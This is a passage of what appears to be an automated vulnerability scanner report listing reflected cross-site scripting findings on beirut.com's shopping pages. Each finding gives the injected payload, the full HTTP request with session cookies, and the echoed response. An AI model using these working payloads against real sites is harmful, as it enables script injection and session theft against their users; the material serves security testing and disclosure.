<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/1943677849a731'-alert(1)-'b933d2c31c6/Accessories-for-Her/48';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.765. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b566a'-alert(1)-'868cb594aa2 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Herb566a'-alert(1)-'868cb594aa2/48 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:22 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61927

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories-for-Herb566a'-alert(1)-'868cb594aa2/48';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.766. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Her/48

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1711c'-alert(1)-'6d4db64a6fb was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Her/481711c'-alert(1)-'6d4db64a6fb HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:01:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55309

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories-for-Her/481711c'-alert(1)-'6d4db64a6fb';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.767. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68187'-alert(1)-'78be639f950 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping68187'-alert(1)-'78be639f950/Clothing-Accessories/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:47:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59729

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping68187'-alert(1)-'78be639f950/Clothing-Accessories/194367784/Accessories-for-Him/47';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.768. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 969bf"><a>043e6c47744 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping969bf"><a>043e6c47744/Clothing-Accessories/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:35:29 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59780

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping969bf"><a>043e6c47744">
...[SNIP]...

4.769. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ad78e'-alert(1)-'6ebc6ecb33b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessoriesad78e'-alert(1)-'6ebc6ecb33b/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:41 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60626

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessoriesad78e'-alert(1)-'6ebc6ecb33b/194367784/Accessories-for-Him/47';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.770. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 3b417<script>alert(1)</script>9df11855083 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories3b417<script>alert(1)</script>9df11855083/194367784/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:53:49 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60601

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories3b417<script>alert(1)</script>9df11855083 <a href="#" id="backlink">
...[SNIP]...

4.771. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25b68'-alert(1)-'d2ba03cb1ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/19436778425b68'-alert(1)-'d2ba03cb1ea/Accessories-for-Him/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:59:12 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59955

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='orange';
var indexpage='Shopping/Clothing-Accessories/19436778425b68'-alert(1)-'d2ba03cb1ea/Accessories-for-Him/47';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.772. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7a5bb'-alert(1)-'d67b41b1a55 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Him7a5bb'-alert(1)-'d67b41b1a55/47 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:05:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60598

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories-for-Him7a5bb'-alert(1)-'d67b41b1a55/47';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.773. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47 [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe3ac'-alert(1)-'b944c3d762d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47fe3ac'-alert(1)-'b944c3d762d HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:09:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55308

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Clothing-Accessories/194367784/Accessories-for-Him/47fe3ac'-alert(1)-'b944c3d762d';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.774. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fe301"><a>ba71952d450 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shoppingfe301"><a>ba71952d450/Clothing-Accessories/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:52:27 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60505

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shoppingfe301"><a>ba71952d450">
...[SNIP]...

4.775. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0382'-alert(1)-'1a305dea957 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shoppinga0382'-alert(1)-'1a305dea957/Clothing-Accessories/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:04:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60077

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shoppinga0382'-alert(1)-'1a305dea957/Clothing-Accessories/194367784/Accessories/37';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.776. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 36f96<script>alert(1)</script>ba10e1b3b0d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Clothing-Accessories36f96<script>alert(1)</script>ba10e1b3b0d/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:12:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62211

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Clothing Accessories36f96<script>alert(1)</script>ba10e1b3b0d <a href="#" id="backlink">
...[SNIP]...

4.777. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 68673'-alert(1)-'ff6b4b93937 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /Shopping/Clothing-Accessories68673'-alert(1)-'ff6b4b93937/194367784/Accessories/37 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 11:11:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Clothing-Accessories68673'-alert(1)-'ff6b4b93937/194367784/Accessories/37';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.778. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Accessories/37 [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.beirut.com
Path:	/Shopping/Clothing-Accessories/194367784/Accessories/37

Issue detail

